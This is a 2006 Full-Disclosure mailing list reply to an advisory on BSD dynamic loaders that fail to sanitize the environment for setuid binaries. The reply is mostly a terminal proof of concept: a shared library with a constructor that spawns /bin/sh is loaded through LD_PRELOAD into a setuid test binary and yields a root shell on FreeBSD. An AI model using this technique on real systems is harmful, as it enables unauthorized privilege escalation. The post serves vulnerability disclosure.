[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-disclosure] Lack of environment sanitization in the FreeBSD, OpenBSD, NetBSD dynamic loaders.
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: Re: [Full-disclosure] Lack of environment sanitization in the FreeBSD, OpenBSD, NetBSD dynamic loaders.
- From: "Tyop?" <tyoptyop@xxxxxxxxx>
- Date: Wed, 22 Nov 2006 22:55:37 +0100
On 11/22/06, In Cognito <defend.the.world@xxxxxxxxx> wrote:
> Impact: Serious. May lead to privilege escalation.
>
> A class of security vulnerabilities has resurfaced in the dynamic loaders
> of FreeBSD, OpenBSD, and NetBSD in the sanitization of environment
> variables for suid and sgid binaries.
>
> Due to either badly implemented sanitization or a lack of it, a setuid
> binary may execute other processes with a tainted environment.
>
> [...]
>
> Have fun! Stay safe!
>
Fun. Not "perfectly" safe.
My experience :
%id
uid=0(root) gid=0(wheel) groups=0(wheel), 5(operator)
%cat vuln.c
main()
{
setuid(0);
execl("/usr/bin/id","id",0);
}
%cc vuln.c -o vuln && chmod 4711 ./vuln
%exit
> id
uid=1001(tyop) gid=1001(tyop) groups=1001(tyop)
> ls -l vuln
-rws--x--x 1 root tyop 4827 Nov 22 22:46 vuln
> cat tyop.c
__attribute__ ((constructor)) main()
{
printf("[+] Hello from shared library land\n");
execle("/bin/sh","sh",0,0);
}
> cc -shared -o lib.so tyop.c
> setenv LD_PRELOAD "/home/tyop/test/lib.so"
> ./vuln
[+] Hello from shared library land
# id
uid=0(root) gid=0(wheel) egid=1001(tyop) groups=1001(tyop)
# echo "It works on `uname -sr`"
It works on FreeBSD 7.0-CURRENT-200609
#
Have a nice day.
--
Tyop?
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/